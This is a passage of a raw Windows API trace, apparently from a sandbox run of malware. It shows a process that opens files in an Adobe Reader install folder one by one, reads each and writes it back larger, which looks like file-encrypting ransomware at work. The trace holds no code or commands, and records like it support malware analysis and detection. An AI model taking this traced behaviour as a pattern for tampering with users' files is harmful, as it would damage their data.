lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Berime.htm", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Berime.htm", lpUsedDefaultChar=0x0) returned 10 [0069.112] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.115] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x32ba [0069.115] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.115] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x32ba [0069.116] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867888*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867888*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.116] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0069.116] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.116] CloseHandle (hObject=0x1cc) returned 1 [0069.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.121] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.121] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41fc [0069.121] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.121] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.121] ReleaseMutex (hMutex=0x168) returned 1 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Llegiu-me.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Llegiu-me.htm", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Llegiu-me.htm", lpUsedDefaultChar=0x0) returned 13 [0069.121] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.123] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x31fc [0069.123] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.123] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x31fc [0069.123] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867888*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867888*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.124] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0069.124] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.124] CloseHandle (hObject=0x1cc) returned 1 [0069.125] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agmgpuoptin.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.126] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.126] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6bf [0069.126] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.126] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.127] ReleaseMutex (hMutex=0x168) returned 1 [0069.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AGMGPUOptIn.ini", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AGMGPUOptIn.ini", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AGMGPUOptIn.ini", lpUsedDefaultChar=0x0) returned 15 [0069.127] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93898, nNumberOfBytesToRead=0x6bf, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93898*, lpNumberOfBytesRead=0x311f2bc*=0x6bf, lpOverlapped=0x0) returned 1 [0069.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.129] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xc47, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f2d0*=0xc47, lpOverlapped=0x0) returned 1 [0069.130] CloseHandle (hObject=0x1cc) returned 1 [0069.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.132] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.132] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e00 [0069.132] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.132] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.132] ReleaseMutex (hMutex=0x168) returned 1 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.EUQ", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.EUQ", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.EUQ", lpUsedDefaultChar=0x0) returned 11 [0069.133] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.135] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.135] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.136] CloseHandle (hObject=0x1cc) returned 1 [0069.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e00 [0069.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.140] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.140] ReleaseMutex (hMutex=0x168) returned 1 [0069.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NOR", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.NOR", lpUsedDefaultChar=0x0) returned 11 [0069.141] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.143] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.143] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.144] CloseHandle (hObject=0x1cc) returned 1 [0069.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e00 [0069.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.147] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.147] ReleaseMutex (hMutex=0x168) returned 1 [0069.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SVE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SVE", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SVE", lpUsedDefaultChar=0x0) returned 11 [0069.147] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.607] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.608] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.609] CloseHandle (hObject=0x1cc) returned 1 [0069.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.611] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.611] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2000 [0069.612] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.612] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.612] ReleaseMutex (hMutex=0x168) returned 1 [0069.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DEU", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DEU", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.DEU", lpUsedDefaultChar=0x0) returned 11 [0069.612] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0069.718] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.718] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0069.719] CloseHandle (hObject=0x1cc) returned 1 [0069.721] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e00 [0069.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.722] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.722] ReleaseMutex (hMutex=0x168) returned 1 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.KOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.KOR", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.KOR", lpUsedDefaultChar=0x0) returned 11 [0069.722] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.774] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.774] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x311f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.775] CloseHandle (hObject=0x1cc) returned 1 [0069.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.777] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.777] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e00 [0069.777] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.777] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.777] ReleaseMutex (hMutex=0x168) returned 1 [0069.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SLV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SLV", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SLV", lpUsedDefaultChar=0x0) returned 11 [0069.777] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x311f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.819] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.819] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.820] CloseHandle (hObject=0x1cc) returned 1 [0069.821] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.822] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.822] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x49c [0069.822] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.822] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.822] ReleaseMutex (hMutex=0x168) returned 1 [0069.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0069.823] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863f38, nNumberOfBytesToRead=0x49c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863f38*, lpNumberOfBytesRead=0x311f2bc*=0x49c, lpOverlapped=0x0) returned 1 [0069.889] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0069.889] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa24, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0xa24, lpOverlapped=0x0) returned 1 [0069.889] CloseHandle (hObject=0x1cc) returned 1 [0069.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0069.892] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.892] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x416 [0069.892] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0069.892] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.893] ReleaseMutex (hMutex=0x168) returned 1 [0069.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 